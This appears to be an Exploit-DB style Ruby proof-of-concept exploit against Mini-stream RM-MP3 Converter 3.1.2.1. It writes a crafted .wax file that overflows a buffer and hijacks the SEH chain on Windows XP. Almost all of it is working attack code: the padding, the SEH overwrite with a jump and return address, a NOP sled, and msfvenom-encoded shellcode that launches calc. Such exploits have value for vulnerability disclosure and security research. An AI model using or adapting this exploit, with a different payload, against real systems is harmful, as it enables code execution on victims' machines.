Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - .wax Local Buffer Overflow (SEH)

#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / [email protected]
# Tested on: Microsoft Windows XP [Version 5.1.2600]

filename = "3-1-2-1-gb.wax"

seh  = 43501
buff = "\x41" * 45000
nops = "\x90" * 16

# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +
"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +
"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +
"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +
"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +
"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +
"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +
"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +
"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +
"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +
"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +
"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +
"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +
"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"

buff[seh-4,4] = "\xeb\x0e\x90\x90"
buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")
buff[seh+4,nops.size] = nops
buff[seh+(4+nops.size),sc.size] = sc

File.open(filename,"wb") do |fp|
  fp.write(buff)
  fp.close
  puts "Exploit file created: #{filename} size: #{buff.size}"
end